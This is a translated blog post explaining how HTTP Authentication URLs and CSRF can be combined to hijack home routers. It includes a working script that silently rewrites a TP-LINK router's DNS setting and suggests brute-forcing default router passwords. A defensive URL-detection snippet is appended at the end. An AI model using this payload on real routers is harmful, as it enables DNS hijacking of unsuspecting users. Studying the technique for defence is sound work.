HTTP Authentication URL and CSRF = Router Hacking

Source: Internet
Author: User
Tags http authentication

First, let's briefly describe what HTTP Authentication is. The server returns a 401 status and a WWW-Authenticate header.

The WWW-Authenticate header contains a description of the HTTP Authentication box, such

The user enters the user name and password in the authentication box, and the browser sends them in the Authorization header.

YWRtaW46YWRtaW4= is the Base64 encoding of admin:admin

 

In fact, all browsers originally supported accessing and logging in through an HTTP Authentication URL, that is:

http://user:password@url

To prevent phishing URLs, Microsoft released a security patch that disables HTTP Authentication URLs. For details, see

http://support.microsoft.com/kb/834489

 

With the background covered, let's look at some earlier work. In the past few years, I have seen several cases of router hacking from overseas. Among them, the Flash UPnP attack is a remarkable one: a port of a specified IP address on the intranet is mapped to the outside for attack. Of course, some router vulnerabilities can also map out the router's web management port for attack. Flash later fixed the security vulnerability.

Back to the topic. We know that most domestic home routers use HTTP Authentication, TP-LINK routers for example. Although IE disables HTTP Authentication URLs, Firefox, Chrome, and other browsers still support them. At the same time, embedding the HTTP Authentication URL in a tag can force a successful HTTP Authentication without any security prompt. So an evil attack method emerges.

 

1. We can use the default IP addresses and default passwords of the various routers in China to construct an HTTP Authentication URL brute-force login script.

2. Use CSRF to modify the router's DNS and point it to our malicious DNS.

For example, the following TP-LINK demo:

<script>
// Demo: an image request that submits the router's DHCP settings form (CSRF).
function dns() {
    alert('I have changed your dns on my domain!');
    var i = new Image();
    i.src = 'http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6';
}
</script>


After visiting tplink.html:

A DNS server, 8.8.8.8, has been silently added!

How could a hacker use this to launch a large-scale attack? Tens of thousands of routers having their DNS silently modified?

This is a common security issue. Have you changed the default password on your router? Fortunately, only Firefox, Chrome, and other browsers have such security issues.
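As an added example (not part of the original article): a small Node.js check a defender can run over page markup or inline script to flag URLs that embed credentials or point at private IPv4 addresses, the two traits the technique above relies on. The function names and the sample markup are constructed for illustration.

```javascript
// Added example: flag resource URLs that carry credentials or target private IPv4 space.
// Matches quoted src/href/action values in tags and in script assignments (x.src = '...').
const ATTR_RE = /\b(?:src|href|action)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;

// True for RFC 1918 IPv4 literals (10/8, 172.16/12, 192.168/16).
function isPrivateIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return a === 10 || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Returns one finding per suspicious absolute http(s) URL found in the text.
function findSuspiciousUrls(html) {
  const findings = [];
  for (const m of html.matchAll(ATTR_RE)) {
    const raw = (m[1] ?? m[2]).trim();
    let u;
    try { u = new URL(raw); } catch { continue; } // relative or malformed: skip
    if (u.protocol !== 'http:' && u.protocol !== 'https:') continue;
    const reasons = [];
    if (u.username || u.password) reasons.push('embedded-credentials');
    if (isPrivateIPv4(u.hostname)) reasons.push('private-address');
    if (reasons.length > 0) {
      // Strip the credentials before reporting so they do not end up in logs.
      u.username = '';
      u.password = '';
      findings.push({ url: u.href, reasons });
    }
  }
  return findings;
}

// Constructed sample page (not taken from the article).
const SAMPLE = `
<img src="http://user:password@192.168.1.1/example.htm?x=1">
<a href="https://example.com/about">about</a>
<img src='http://10.0.0.1/status.png'>
<script src="/static/app.js"></script>
<script>var i = new Image(); i.src = 'http://192.168.1.1/example.htm?y=2';</script>`;

console.log(findSuspiciousUrls(SAMPLE));
```

A public page has little legitimate reason to load resources from a visitor's private address space, so either finding is worth reviewing in a proxy, crawler or content filter.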

 

From: RAyh4c Black Box
